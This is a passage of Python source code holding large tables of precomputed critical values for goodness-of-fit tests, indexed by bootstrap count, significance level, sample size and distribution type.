0.020780448913574223, 0.024234161376953132, 0.027772254943847663, 0.031383972167968746, 0.03506069183349609, 0.03879554748535156, 0.042582817077636705, 0.046417617797851536, 0.0502959060668945, 0.05421424865722652, 0.058169593811035106, 0.06215934753417964, 0.06618122100830073, 0.07023315429687496, 0.07431339263916009, 0.0784202575683593, 0.08255237579345695, 0.08670837402343741, 0.09088710784912102, 0.09508750915527336, 0.09930858612060539, 0.10354949951171868, 0.10780941009521477, 0.11208747863769523, 0.11638309478759756, 0.12069564819335926, 0.12502437591552723, 0.12936889648437494, 0.13372867584228512, 0.13810310363769526, 0.14249187469482413, 0.14689445495605458, 0.1513105392456054, 0.15573974609374996, 0.1601816940307617, 0.16463607788085938, 0.1691025161743164, 0.17358085632324222, 0.1780707168579102, 0.1825718688964844, 0.18708415985107427, 0.19160713195800783, 0.1961407852172852, 0.20068489074707038, 0.20523906707763678, 0.20980331420898446, 0.21437740325927743, 0.21896118164062506, 0.2235544204711915, 0.2281569671630861, 0.23276882171630878, 0.2373896789550783, 0.2420194625854494, 0.2466580200195314, 0.25130535125732434, 0.25596115112304696, 0.26062549591064466, 0.26529823303222666, 0.26997913360595704, 0.27466827392578125, 0.27936550140380856, 0.28407066345214843, 0.28878376007080075, 0.2935047149658203, 0.2982334518432618, 0.3029698181152345, 0.3077138137817384, 0.31246543884277356, 0.3172245407104493, 0.3219910430908204, 0.32676502227783205, 0.3315462493896485, 0.3363348007202148, 0.3411306762695312, 0.3459336471557617, 0.35074386596679696, 0.35556118011474624, 0.3603855895996096, 0.36521709442138695, 0.37005554199218776, 0.3749010848999026, 0.3797535705566409, 0.3846130752563479, 0.3894794464111331, 0.3943527603149417, 0.3992329406738284, 0.4041200637817386, 0.4090139770507816, 0.4139148330688479, 0.4188224792480471, 0.42373706817626977, 0.4286584472656253, 0.433586692810059, 0.43852172851562543, 0.44346363067627004, 0.4484123992919927, 0.45336803436279355, 0.45833053588867245, 0.46329982757568416, 0.4682761383056646, 0.4732592391967779, 0.47824928283691465, 0.4832463455200201, 0.4882502746582037, 0.49326122283935603, 0.4982791900634771, 0.5033041000366216, 0.5083361816406258, 0.5133752822875985, 0.5184215545654305, 0.523474998474122, 0.5285356903076182, 0.5336035537719737, 0.5386787414550791, 0.5437613296508799, 0.5488512420654308, 0.5539486312866222, 0.5590534973144541, 0.5641659927368174, 0.5692860412597667, 0.5744137954711925, 0.5795494079589856, 0.584692726135255, 0.5898440551757824, 0.5950033950805675, 0.6001707458496106, 0.605346260070802, 0.6105300903320323, 0.6157223129272471, 0.6209229278564463, 0.6261321640014659, 0.6313500976562509, 0.6365768814086923, 0.6418125152587899, 0.6470573043823251, 0.6523112487792979, 0.657574577331544, 0.6628474426269542, 0.6681299209594738, 0.6734222412109387, 0.6787246322631848, 0.6840371704101575, 0.6893601608276381, 0.6946936798095718, 0.7000381088256851, 0.7053936004638688, 0.7107603836059586, 0.7161387634277359, 0.7215289688110367, 0.7269313049316422, 0.7323460769653336, 0.7377736663818375, 0.7432143020629898, 0.7486685180664077, 0.7541365432739273, 0.7596189117431658, 0.7651160049438495, 0.770628433227541, 0.7761565017700216, 0.7817009735107443, 0.7872623825073264, 0.7928412628173851, 0.7984385299682641, 0.8040547180175805, 0.8096908187866236, 0.8153476715087917, 0.8210262680053737, 0.8267276763916043, 0.8324530410766631, 0.8382038116455108, 0.843981285095218, 0.8497872161865265, 0.8556233596801788, 0.8614917755126983, 0.8673948287963897, 0.8733351135253937, 0.8793157577514681, 0.8853402709960971, 0.8914127731323276, 0.8975381469726595, 0.9037223434448278, 0.909972457885746, 0.9162973403930701, 0.922708053588871, 0.9292190170288124, 0.9358493804931678, 0.9426256179809609, 0.949586410522465, 0.9567917251586955, 0.9643453216552775, 0.9724580764770547, 0.981724624633793], # skipcq: FLK-E501 'num_bt = 100, alpha = 0.1': [0.0010530471801757815, 0.005330657958984376, 0.011070747375488285, 0.01755897521972656, 0.024520378112792965, 0.03181716918945312, 0.039369010925292956, 0.0471240997314453, 0.0550467300415039, 0.06311126708984374, 0.07129817962646484, 0.07959266662597655, 0.08798267364501955, 0.0964585876464844, 0.10501262664794928, 0.11363807678222662, 0.12232944488525396, 0.13108200073242193, 0.13989154815673835, 0.14875457763671884, 0.15766803741455088, 0.16662918090820322, 0.1756356430053712, 0.18468521118164077, 0.19377597808837904, 0.20290626525878921, 0.21207454681396504, 0.22127944946289085, 0.23051967620849634, 0.23979415893554712, 0.24910182952880888, 0.25844184875488313, 0.2678132247924808, 0.2772153472900394, 0.28664737701416043, 0.29610877990722684, 0.30559902191162136, 0.31511749267578154, 0.32466373443603547, 0.3342373657226566, 0.3438380813598637, 0.3534654235839848, 0.363119163513184, 0.37279899597168015, 0.3825047683715824, 0.39223625183105515, 0.4019932937622075, 0.4117758178710942, 0.4215836715698247, 0.4314168548583989, 0.4412752151489262, 0.45115890502929734, 0.4610678482055669, 0.47100219726562553, 0.48096195220947324, 0.4909472656250006, 0.5009583663940438, 0.5109952545166023, 0.5210583877563484, 0.5311478424072273, 0.5412639999389655, 0.5514071655273443, 0.5615777206420904, 0.5717761230468756, 0.5820027542114266, 0.5922581481933602, 0.6025429153442392, 0.612857666015626, 0.6232031631469737, 0.6335800170898447, 0.6439892196655284, 0.654431610107423, 0.6649082565307629, 0.6754202270507825, 0.6859688186645521, 0.6965554809570325, 0.7071815872192395, 0.7178489685058607, 0.7285595321655287, 0.739315338134767, 0.7501188278198256, 0.7609728240966811, 0.7718803024292007, 0.7828448486328139, 0.7938705825805679, 0.8049623107910171, 0.8161255264282241, 0.827366867065431, 0.8386942672729505, 0.8501174163818372, 0.8616481399536144, 0.8733016204833997, 0.8850971603393565, 0.8970608520507823, 0.9092285537719738, 0.9216524505615247, 0.9344142532348645, 0.9476547241210949, 0.9616604995727549, 0.9772372436523449], # skipcq: FLK-E501 'num_bt = 100, alpha = 0.05': [0.0005128097534179688, 0.0035651397705078114, 0.008225822448730467, 0.01377662658691406, 0.019905586242675778, 0.026449737548828123, 0.03331188201904297, 0.040428848266601564, 0.0477566146850586, 0.055263214111328125, 0.06292453765869141, 0.07072181701660157, 0.07864017486572264, 0.0866675567626953, 0.09479404449462892, 0.10301116943359379, 0.11131214141845708, 0.1196907806396485, 0.12814197540283206, 0.13666130065917975, 0.14524478912353522, 0.15388900756835944, 0.16259090423583994, 0.17134765625000012, 0.18015705108642593, 0.18901679992675796, 0.19792491912841811, 0.2068797302246095, 0.21587963104248062, 0.22492324829101581, 0.23400913238525406, 0.24313629150390642, 0.2523035049438478, 0.26150985717773456, 0.2707544326782229, 0.2800365447998049, 0.2893553543090823, 0.29871025085449254, 0.30810070037841836, 0.31752601623535204, 0.32698581695556694, 0.33647972106933655, 0.34600734710693426, 0.3555682373046881, 0.36516231536865296, 0.37478912353515687, 0.3844486618041999, 0.39414070129394607, 0.4038650131225594, 0.41362174987793054, 0.42341068267822346, 0.4332318878173837, 0.443085365295411, 0.4529711914062508, 0.46288959503173915, 0.4728406524658212, 0.48282451629638756, 0.4928414916992196, 0.5028918075561533, 0.5129758453369149, 0.5230939102172858, 0.5332465362548835, 0.5434341049194344, 0.5536571502685554, 0.5639163589477547, 0.5742122650146493, 0.5845457077026375, 0.5949174499511725, 0.605328330993653, 0.6157794189453132, 0.6262716293334969, 0.6368063354492195, 0.6473846817016609, 0.6580081939697273, 0.6686784744262704, 0.6793972015380867, 0.6901663589477547, 0.7009882354736336, 0.7118651199340829, 0.7227997589111337, 0.7337952804565437, 0.7448551177978522, 0.7559832382202156, 0.767184143066407, 0.778463096618653, 0.7898260498046881, 0.8012801742553717, 0.812833862304688, 0.8244971847534186, 0.836282348632813, 0.8482045364379889, 0.8602828979492192, 0.8725419998168951, 0.8850147247314459, 0.8977466201782232, 0.9108037567138676, 0.9242892074584965, 0.9383808135986333, 0.9534402084350593, 0.9704869842529305], # skipcq: FLK-E501 'num_bt = 100, alpha = 0.025': [0.00025318145751953127, 0.0024313354492187496, 0.00622997283935547, 0.011004486083984376, 0.016431846618652345, 0.022334899902343747, 0.02860530853271484, 0.03517158508300782, 0.04198360443115235, 0.04900466918945313, 0.056207008361816406, 0.06356887817382811, 0.07107303619384765, 0.07870536804199217, 0.0864543533325195, 0.09431030273437495, 0.10226490020751948, 0.11031120300292963, 0.11844318389892572, 0.12665557861328114, 0.13494373321533193, 0.14330360412597648, 0.15173160552978507, 0.1602246093749999, 0.16877971649169915, 0.1773944091796874, 0.18606639862060537, 0.19479362487792956, 0.20357418060302723, 0.21240638732910144, 0.22128879547119132, 0.23021987915039055, 0.23919857025146474, 0.24822349548339834, 0.25729381561279285, 0.26640838623046864, 0.2755665969848631, 0.2847674560546874, 0.2940104293823241, 0.3032947540283201, 0.31261997222900373, 0.32198554992675765, 0.33139102935791, 0.3408360290527342, 0.350320243835449, 0.35984336853027327, 0.369405174255371, 0.3790055084228515, 0.38864414215087884, 0.3983211517333983, 0.4080363082885741, 0.4177897644042967, 0.42758152008056627, 0.43741157531738273, 0.44728015899658197, 0.45718749999999997, 0.46713375091552733, 0.4771192169189453, 0.48714420318603513, 0.49720916748046873, 0.5073144912719727, 0.517460708618164, 0.5276483535766601, 0.5378781127929686, 0.5481506729125976, 0.5584667205810545, 0.5688272476196286, 0.5792331695556638, 0.589685478210449, 0.600185317993164, 0.6107340621948241, 0.6213330078124999, 0.631983757019043, 0.6426879119873048, 0.6534475326538087, 0.6642645263671876, 0.6751412582397462, 0.6860803222656253, 0.6970846176147463, 0.7081573486328125, 0.7193020248413087, 0.7305229187011719, 0.7418246078491211, 0.7532124328613279, 0.7646924972534177, 0.7762720489501949, 0.7879593276977535, 0.7997643280029292, 0.8116988754272456, 0.8237773895263665, 0.8360177230834953, 0.8484423828124994, 0.8610802841186516, 0.8739700317382804, 0.8871651077270499, 0.9007428741455068, 0.9148239517211905, 0.9296160888671865, 0.9455405807495105, 0.9637833404541005], # skipcq: FLK-E501 'num_bt = 50, alpha = 0.1': [0.002104988098144531, 0.010686798095703127, 0.022243995666503903, 0.03534767150878906, 0.04944561004638671, 0.06426040649414061, 0.07962970733642577, 0.09544906616210938, 0.11164653778076172, 0.12817016601562498, 0.14498111724853516, 0.1620494842529297, 0.1793517684936524, 0.19686920166015628, 0.21458644866943363, 0.23249114990234374, 0.25057315826416016, 0.2688238525390625, 0.28723644256591796, 0.30580520629882824, 0.32452541351318376, 0.34339347839355494, 0.36240657806396515, 0.38156257629394563, 0.4008601760864261, 0.42029869079589877, 0.439878196716309, 0.45959922790527385, 0.4794631576538091, 0.4994721984863286, 0.5196290206909184, 0.5399374389648441, 0.5604021072387699, 0.5810285949707035, 0.601823997497559, 0.6227967071533207, 0.6439570236206058, 0.6653173065185549, 0.6868929672241213, 0.7087026977539064, 0.7307703018188476, 0.7531256103515627, 0.7758077621459962, 0.7988690185546876, 0.8223818588256835, 0.8464518737792968, 0.8712435531616209, 0.897040786743164, 0.9244193649291994, 0.9549925994873047], # skipcq: FLK-E501 'num_bt = 50, alpha = 0.05': [0.0010253524780273436, 0.007153701782226562, 0.016551856994628904, 0.027787704467773428, 0.040236625671386715, 0.053571395874023424, 0.06759670257568356, 0.08218505859375, 0.09724811553955079, 0.11272163391113282, 0.1285573959350586, 0.14471817016601565, 0.1611745834350586, 0.1779032135009766, 0.19488491058349616, 0.2121041107177735, 0.22954799652099614, 0.24720588684082034, 0.2650691604614259, 0.28313056945800796, 0.3013843917846682, 0.3198258972167971, 0.33845157623291044, 0.3572587585449221, 0.376245918273926, 0.395412063598633, 0.4147572708129885, 0.4342823791503908, 0.45398914337158225, 0.4738802337646486, 0.4939592361450197, 0.5142308807373048, 0.5347008895874026, 0.5553767395019535, 0.5762670516967778, 0.5973825836181648, 0.6187364578247077, 0.6403443145751957, 0.6622255325317388, 0.6844039154052739, 0.7069094467163091, 0.7297798919677738, 0.7530647659301761, 0.7768299865722659, 0.8011670303344729, 0.826208877563477, 0.852162818908692, 0.8793858337402352, 0.9086018753051766, 0.9418449401855475], # skipcq: FLK-E501 'num_bt = 50, alpha = 0.025': [0.0005062484741210939, 0.004881439208984375, 0.012548561096191409, 0.022227935791015625, 0.03327510833740233, 0.045335311889648414, 0.058191719055175756, 0.07170074462890623, 0.08576206207275389, 0.10030220031738282, 0.11526584625244143, 0.1306098937988281, 0.1463006210327148, 0.1623106384277343, 0.17861782073974602, 0.1952041625976562, 0.21205471038818355, 0.22915710449218749, 0.24650104522705074, 0.26407836914062494, 0.28188220977783196, 0.29990722656249996, 0.31814914703369135, 0.3366050720214844, 0.3552730178833008, 0.37415191650390633, 0.3932419967651368, 0.4125440979003908, 0.4320604324340822, 0.4517940521240237, 0.47174915313720733, 0.4919313812255862, 0.5123475265502933, 0.5330061340332035, 0.5539176559448247, 0.5750946807861332, 0.5965523147583014, 0.6183092498779303, 0.6403881454467779, 0.6628169250488287, 0.685630607604981, 0.7088736724853519, 0.7326040267944338, 0.7568986511230471, 0.7818646621704104, 0.8076572418212895, 0.8345180892944339, 0.8628623962402346, 0.8935304641723636, 0.9288782501220707], # skipcq: FLK-E501 'num_bt = 30, alpha = 0.1': [0.003505865732828776, 0.0178689956665039, 0.03730777104695638, 0.05944360097249348, 0.08335453669230143, 0.10857747395833334, 0.13484245936075845, 0.16197719573974612, 0.18986501693725588, 0.21842352549235028, 0.24759359359741212, 0.2773321787516274, 0.3076083819071449, 0.33840077718098927, 0.3696960131327308, 0.40148760477701795, 0.4337754885355629, 0.4665662765502927, 0.4998735745747882, 0.5337188084920246, 0.5681330680847166, 0.6031595865885414, 0.6388580004374184, 0.6753109614054361, 0.7126363436381019, 0.7510082880655921, 0.7907005627950029, 0.8321870803833004, 0.8764300346374508, 0.926118723551432], # skipcq: FLK-E501 'num_bt = 30, alpha = 0.05': [0.0017083168029785158, 0.011975797017415368, 0.02781553268432617, 0.04685484568277994, 0.06805556615193684, 0.09087403615315756, 0.11498689651489258, 0.14018510182698568, 0.1663259824117025, 0.19330844879150394, 0.22105944951375328, 0.2495258967081706, 0.2786695798238119, 0.30846405029296875, 0.3388926506042481, 0.3699475606282553, 0.4016289710998535, 0.4339452743530273, 0.46691370010375977, 0.5005613327026367, 0.5349272727966307, 0.5700660705566404, 0.6060525576273598, 0.6429908752441403, 0.6810288429260251, 0.7203848520914709, 0.7614021619160968, 0.8046739578247067, 0.851403903961181, 0.9049661636352534], # skipcq: FLK-E501 'num_bt = 30, alpha = 0.025': [0.0008435885111490885, 0.008178138732910154, 0.021117115020751948, 0.03755346934000651, 0.056421693166097, 0.07713553110758462, 0.09933786392211913, 0.12279478708902995, 0.1473451932271322, 0.1728741963704427, 0.19929863611857096, 0.22655766805013022, 0.2546075503031413, 0.283418083190918, 0.3129702568054199, 0.3432552337646484, 0.3742734591166178, 0.4060349146525065, 0.4385598182678224, 0.4718799591064454, 0.5060409863789878, 0.5411063512166342, 0.5771634737650556, 0.6143334706624354, 0.6527883211771653, 0.6927816390991218, 0.7347115516662605, 0.7792645772298182, 0.827830537160238, 0.8842966715494796], # skipcq: FLK-E501 'num_bt = 20, alpha = 0.1': [0.005254220962524414, 0.026914119720458988, 0.05641789436340332, 0.0902134895324707, 0.12692608833312985, 0.16587238311767571, 0.20666403770446767, 0.24906482696533194, 0.29292883872985825, 0.33817090988159165, 0.3847514629364012, 0.4326707839965818, 0.4819692134857176, 0.5327330589294432, 0.5851095676422118, 0.6393381118774413, 0.6958132266998289, 0.7552347183227537, 0.8190390110015868, 0.8912508964538572], # skipcq: FLK-E501 'num_bt = 20, alpha = 0.05': [0.002561426162719727, 0.01806516647338867, 0.04216942787170409, 0.07135391235351564, 0.1040808200836182, 0.13955373764038093, 0.17731089591979982, 0.21706857681274416, 0.25865063667297367, 0.30195388793945327, 0.3469314098358156, 0.39358491897583026, 0.4419655323028567, 0.49218158721923855, 0.5444176197052006, 0.5989718437194829, 0.6563361644744876, 0.7173814773559575, 0.7838938236236577, 0.8608916282653813], # skipcq: FLK-E501 'num_bt = 20, alpha = 0.025': [0.0012650966644287111, 0.012348556518554692, 0.032070970535278326, 0.05733404159545899, 0.08657145500183107, 0.11893157958984377, 0.1539091587066651, 0.19119005203247075, 0.2305778980255127, 0.27195787429809565, 0.31527810096740716, 0.36054258346557605, 0.4078114986419677, 0.4572108268737792, 0.5089540958404539, 0.5633859634399412, 0.6210731983184814, 0.6830172538757324, 0.7512671947479248, 0.8315665245056152] # skipcq: FLK-E501 } # List of the maximal values to the significance niveau 'gof_alpha', the sample-size 'num_init' and the single # distributions in the initial KS-tests self.crit_val_ini_ks = {0.001: {1000: {'uni': 0.06174732010933548, 'nor': 0.03896795290941646, 'beta1': 0.06139681196262953, 'beta2': 0.12199585736700946, 'beta4': 0.04582502097984753}, 750: {'uni': 0.07024635538683371, 'nor': 0.04459569470155689, 'beta1': 0.07021684632565739, 'beta2': 0.12815976069728274, 'beta4': 0.05264080908630758}, 500: {'uni': 0.08642770525355598, 'nor': 0.05509110394413119, 'beta1': 0.08761941562012493, 'beta2': 0.14913744793549832, 'beta4': 0.06421826877149445}, 400: {'uni': 0.09655798845997815, 'nor': 0.0613993273533881, 'beta1': 0.0964224097850293, 'beta2': 0.15858083637195353, 'beta4': 0.07290090814924588}, 300: {'uni': 0.11164843625013415, 'nor': 0.07106128126671396, 'beta1': 0.11009775320915205, 'beta2': 0.17523769295342007, 'beta4': 0.08305783948716328}, 200: {'uni': 0.13628359610263507, 'nor': 0.08740964922426725, 'beta1': 0.1376486743610651, 'beta2': 0.2010516066361282, 'beta4': 0.10286264686710184}, 150: {'uni': 0.15651662849813364, 'nor': 0.10038713469524929, 'beta1': 0.15819608234185656, 'beta2': 0.22229910725996993, 'beta4': 0.11634654326012955}, 100: {'uni': 0.19072306639877157, 'nor': 0.12280360833310089, 'beta1': 0.19321091289173042, 'beta2': 0.2581947494944321, 'beta4': 0.14328917055317145}, 75: {'uni': 0.21934961884964826, 'nor': 0.14015948249260646, 'beta1': 0.2219326490803759, 'beta2': 0.2846540951939676, 'beta4': 0.1652852320527448}, 50: {'uni': 0.2645907926740654, 'nor': 0.1710961682554944, 'beta1': 0.2678719773943101, 'beta2': 0.3289035352446858, 'beta4': 0.1999598991299047}, 30: {'uni': 0.3379078488296823, 'nor': 0.21594948610382936, 'beta1': 0.3441129978995892, 'beta2': 0.39361692414493443, 'beta4': 0.2508472086556259}, 20: {'uni': 0.3959074827161117, 'nor': 0.2608433948642659, 'beta1': 0.4133477648489873, 'beta2': 0.44853631830721913, 'beta4': 0.29952120108891395}, 10: {'uni': 0.5170765814161853, 'nor': 0.35733312354157704, 'beta1': 0.5398708466808257, 'beta2': 0.5422967523113658, 'beta4': 0.40686356644018595}}, 0.005: {1000: {'uni': 0.05458116632544635, 'nor': 0.03504577921766977, 'beta1': 0.054517449744692026, 'beta2': 0.10728185476765839, 'beta4': 0.040733497260050544}, 750: {'uni': 0.06253533672182854, 'nor': 0.04046369401135186, 'beta1': 0.06282543848266553, 'beta2': 0.11279561980513325, 'beta4': 0.04705273659300363}, 500: {'uni': 0.07714054796228054, 'nor': 0.0496468687606364, 'beta1': 0.07693955943931102, 'beta2': 0.1327433163224424, 'beta4': 0.05731924299024538}, 400: {'uni': 0.08617878042484084, 'nor': 0.05541748786526407, 'beta1': 0.08588821546881897, 'beta2': 0.13875443390078235, 'beta4': 0.06439825899654178}, 300: {'uni': 0.0986714495305242, 'nor': 0.06407724459065156, 'beta1': 0.09855314389102021, 'beta2': 0.1548737996243767, 'beta4': 0.07467900099977004}, 200: {'uni': 0.12062451647295991, 'nor': 0.07827596978503826, 'beta1': 0.12126943895923059, 'beta2': 0.17825544608232347, 'beta4': 0.09076754278924304}, 150: {'uni': 0.1396796839473482, 'nor': 0.09009210049264571, 'beta1': 0.14063288933757345, 'beta2': 0.1973907310236372, 'beta4': 0.10499002205047378}, 100: {'uni': 0.16922995185830964, 'nor': 0.10980683219099052, 'beta1': 0.17129406122009094, 'beta2': 0.22813210844235704, 'beta4': 0.12749534525918932}, 75: {'uni': 0.1953541681412001, 'nor': 0.12554665985678326, 'beta1': 0.19610381489611384, 'beta2': 0.25287194709425875, 'beta4': 0.1469739325714672}, 50: {'uni': 0.23503320028575814, 'nor': 0.15335710820924087, 'beta1': 0.23890161565850354, 'beta2': 0.2925965166545206, 'beta4': 0.17739407623100112}, 30: {'uni': 0.2976485313317806, 'nor': 0.19613498929034934, 'beta1': 0.3040864499477276, 'beta2': 0.35138347538048526, 'beta4': 0.22579108547722582}, 20: {'uni': 0.35388424243927113, 'nor': 0.23656926834477043, 'beta1': 0.36668171084515955, 'beta2': 0.39736542044382106, 'beta4': 0.2701286497170594}, 10: {'uni': 0.4630097657380493, 'nor': 0.3225433246916215, 'beta1': 0.47835376241010186, 'beta2': 0.4896209566095471, 'beta4': 0.36159750656596396}}, 0.01: {1000: {'uni': 0.05134454385349413, 'nor': 0.03330600875133105, 'beta1': 0.051275152087156495, 'beta2': 0.10009870323144221, 'beta4': 0.03865995666339189}, 750: {'uni': 0.05905726508494702, 'nor': 0.0383879788508078, 'beta1': 0.059272477516056354, 'beta2': 0.10502806705945988, 'beta4': 0.04450291981279328}, 500: {'uni': 0.07249296242654668, 'nor': 0.046932424204244594, 'beta1': 0.07240630431885364, 'beta2': 0.12408220110978818, 'beta4': 0.05424039706492939}, 400: {'uni': 0.080902691313323, 'nor': 0.05248129300353904, 'beta1': 0.08043677899242607, 'beta2': 0.12974923298059704, 'beta4': 0.06073621209890695}, 300: {'uni': 0.09306590895115929, 'nor': 0.06042909220901882, 'beta1': 0.0929294897119688, 'beta2': 0.14441139871845998, 'beta4': 0.07029934609881988}, 200: {'uni': 0.11331581936959173, 'nor': 0.07407780477974035, 'beta1': 0.11400852794991234, 'beta2': 0.16697088723911058, 'beta4': 0.08578814408291241}, 150: {'uni': 0.13110747055603822, 'nor': 0.08511174074211825, 'beta1': 0.13197498872552438, 'beta2': 0.18525721022812291, 'beta4': 0.09923887427643563}, 100: {'uni': 0.15947898396010982, 'nor': 0.10396630211898589, 'beta1': 0.16076780252138057, 'beta2': 0.21274473456821097, 'beta4': 0.1203847339328595}, 75: {'uni': 0.18341423985159883, 'nor': 0.11924687585622445, 'beta1': 0.1847923465861807, 'beta2': 0.23689175806686585, 'beta4': 0.13862384194648647}, 50: {'uni': 0.22065058332465762, 'nor': 0.14525710370631756, 'beta1': 0.2245287846345721, 'beta2': 0.27453195725371937, 'beta4': 0.16751626430377106}, 30: {'uni': 0.2806366070013675, 'nor': 0.18585975643934483, 'beta1': 0.28507040255377625, 'beta2': 0.32929770986141144, 'beta4': 0.2134224231720387}, 20: {'uni': 0.3334575751692692, 'nor': 0.22511252321148278, 'beta1': 0.3441640350433964, 'beta2': 0.3740749374193295, 'beta4': 0.2544162136548306}, 10: {'uni': 0.4366755558485817, 'nor': 0.3071991308976279, 'beta1': 0.4527891584489994, 'beta2': 0.46379050302844543, 'beta4': 0.34067023770504523}}, 0.05: {1000: {'uni': 0.04280142303978185, 'nor': 0.02860827073335037, 'beta1': 0.04282682578644642, 'beta2': 0.07986970874762322, 'beta4': 0.03275686429767982}, 750: {'uni': 0.049427811587210435, 'nor': 0.03298169164204601, 'beta1': 0.049275909605582924, 'beta2': 0.08486927467601035, 'beta4': 0.03775404114622272}, 500: {'uni': 0.06038458458366747, 'nor': 0.04027106205628239, 'beta1': 0.060195942616294934, 'beta2': 0.09995114375214009, 'beta4': 0.04613912209290452}, 400: {'uni': 0.0671626804698282, 'nor': 0.044967180104620696, 'beta1': 0.06747611786364349, 'beta2': 0.10571668604744544, 'beta4': 0.05152182574562672}, 300: {'uni': 0.07742312239112692, 'nor': 0.051666837623702166, 'beta1': 0.07767087703759445, 'beta2': 0.1178767433776362, 'beta4': 0.059452507414415046}, 200: {'uni': 0.09469966587530276, 'nor': 0.06343358521113673, 'beta1': 0.0950578895294647, 'beta2': 0.1366784736556006, 'beta4': 0.07255703928500457}, 150: {'uni': 0.10900935208153273, 'nor': 0.07289171579483816, 'beta1': 0.11002479909769114, 'beta2': 0.15242729269865973, 'beta4': 0.08373240678443566}, 100: {'uni': 0.13281274766076206, 'nor': 0.08920713936479638, 'beta1': 0.13377803165947766, 'beta2': 0.17499650468558625, 'beta4': 0.10190606958299475}, 75: {'uni': 0.15239779918045748, 'nor': 0.10243980804370362, 'beta1': 0.1541106817008704, 'beta2': 0.19485071272087295, 'beta4': 0.11705102736538112}, 50: {'uni': 0.18438141684534104, 'nor': 0.12466885274854955, 'beta1': 0.18728113451838269, 'beta2': 0.22658281610394648, 'beta4': 0.14239913459102727}, 30: {'uni': 0.23331654346299174, 'nor': 0.15906588455123438, 'beta1': 0.2387860500631408, 'beta2': 0.2718245732806131, 'beta4': 0.18048185108580744}, 20: {'uni': 0.2786314950878662, 'nor': 0.19349526617388257, 'beta1': 0.28589622085949756, 'beta2': 0.31147388293415956, 'beta4': 0.2164769385370286}, 10: {'uni': 0.3661289030334679, 'nor': 0.2658953985567251, 'beta1': 0.379401813819888, 'beta2': 0.38802519102270194, 'beta4': 0.2910744690699496}}, 0.1: {1000: {'uni': 0.038515938269794825, 'nor': 0.026313661922827247, 'beta1': 0.03860111298969593, 'beta2': 0.0695550650755411, 'beta4': 0.029845093507530562}, 750: {'uni': 0.04446055609985289, 'nor': 0.030266189959470058, 'beta1': 0.044472158939188655, 'beta2': 0.07438972690212953, 'beta4': 0.03440796201601326}, 500: {'uni': 0.054329235300242695, 'nor': 0.03705807984250126, 'beta1': 0.054235810729029665, 'beta2': 0.08755778874782771, 'beta4': 0.04215154900032181}, 400: {'uni': 0.06062042253055755, 'nor': 0.04134489759753035, 'beta1': 0.06087419042912867, 'beta2': 0.09290608277922241, 'beta4': 0.04695774138644898}, 300: {'uni': 0.06979122578785563, 'nor': 0.04752352646874458, 'beta1': 0.06987407314079985, 'beta2': 0.1036455137376669, 'beta4': 0.05408391441556548}, 200: {'uni': 0.08525612760509743, 'nor': 0.05822021391999288, 'beta1': 0.08573405996535222, 'beta2': 0.12083720989995606, 'beta4': 0.06606270634268102}, 150: {'uni': 0.09822498098395582, 'nor': 0.0670687425730856, 'beta1': 0.09891726246491339, 'beta2': 0.134942222786968, 'beta4': 0.07625187550090379}, 100: {'uni': 0.11942187198187654, 'nor': 0.08196700841704041, 'beta1': 0.12048182599113988, 'beta2': 0.15542188429324677, 'beta4': 0.0927888394179889}, 75: {'uni': 0.13700377353508753, 'nor': 0.09413798516069916, 'beta1': 0.13863023455324552, 'beta2': 0.1728224431499087, 'beta4': 0.10651114960711697}, 50: {'uni': 0.16595760075302907, 'nor': 0.11446069154286698, 'beta1': 0.1684755311187931, 'beta2': 0.20208064524892055, 'beta4': 0.12935863603313313}, 30: {'uni': 0.2099293273700812, 'nor': 0.1463282048690624, 'beta1': 0.21473921841431154, 'beta2': 0.24269192295102882, 'beta4': 0.1646851441089735}, 20: {'uni': 0.25056763248182895, 'nor': 0.17786313124907188, 'beta1': 0.2575087202242632, 'beta2': 0.27927953593860777, 'beta4': 0.19740515280724447}, 10: {'uni': 0.3304962789807138, 'nor': 0.2447591671591835, 'beta1': 0.3420336141758848, 'beta2': 0.34940564498843646, 'beta4': 0.26587190498978686}}, 0.2: {1000: {'uni': 0.033759081350374254, 'nor': 0.02372992290154119, 'beta1': 0.03379104644423217, 'beta2': 0.05775603239505678, 'beta4': 0.026618493861847614}, 750: {'uni': 0.03897357249045624, 'nor': 0.027281398645080723, 'beta1': 0.038972994365299635, 'beta2': 0.0621653283130667, 'beta4': 0.030665891126849754}, 500: {'uni': 0.04758909935471711, 'nor': 0.03337684532828111, 'beta1': 0.047570804678383094, 'beta2': 0.07333077050088904, 'beta4': 0.037565566599256583}, 400: {'uni': 0.053119550234104085, 'nor': 0.03725028390570345, 'beta1': 0.053295404906414934, 'beta2': 0.0782294183344644, 'beta4': 0.04183281867666566}, 300: {'uni': 0.061196404682106964, 'nor': 0.04292324729747321, 'beta1': 0.06136906566660827, 'beta2': 0.08744970320312462, 'beta4': 0.04824159064240345}, 200: {'uni': 0.0746784511345509, 'nor': 0.0524733341649114, 'beta1': 0.07510973684586475, 'beta2': 0.10260712327402122, 'beta4': 0.058942065335903404}, 150: {'uni': 0.08595093737016697, 'nor': 0.060424202583133746, 'beta1': 0.08641030234814334, 'beta2': 0.1148837044228368, 'beta4': 0.0679067944916304}, 100: {'uni': 0.10443555935757931, 'nor': 0.07374329417580833, 'beta1': 0.10551157755974006, 'beta2': 0.13294004606451998, 'beta4': 0.08265330043672003}, 75: {'uni': 0.11993235153506276, 'nor': 0.08480408445268339, 'beta1': 0.12138149971982604, 'beta2': 0.14821067875308103, 'beta4': 0.09487982606384139}, 50: {'uni': 0.1450901598179003, 'nor': 0.10314539464936745, 'beta1': 0.14745197306443125, 'beta2': 0.17411692213927954, 'beta4': 0.11517539906859259}, 30: {'uni': 0.18368281401813502, 'nor': 0.1321090658183411, 'beta1': 0.1875463935108379, 'beta2': 0.21006490447672693, 'beta4': 0.14663588943386274}, 20: {'uni': 0.2196807646682773, 'nor': 0.15994694395320508, 'beta1': 0.22522106948161613, 'beta2': 0.24235899456781695, 'beta4': 0.17573119318593766}, 10: {'uni': 0.2888943190995493, 'nor': 0.220722689927199, 'beta1': 0.2985481150360235, 'beta2': 0.3045137581383749, 'beta4': 0.236985210651535}}, 0.25: {1000: {'uni': 0.032062416809360894, 'nor': 0.0227866671462571, 'beta1': 0.03208834216728629, 'beta2': 0.05337049741834132, 'beta4': 0.025475357813055488}, 750: {'uni': 0.03701423511603763, 'nor': 0.026225229844276166, 'beta1': 0.03703256957864909, 'beta2': 0.057813715669675636, 'beta4': 0.02936248102422831}, 500: {'uni': 0.045227717679089396, 'nor': 0.0320485047106529, 'beta1': 0.04519714698473515, 'beta2': 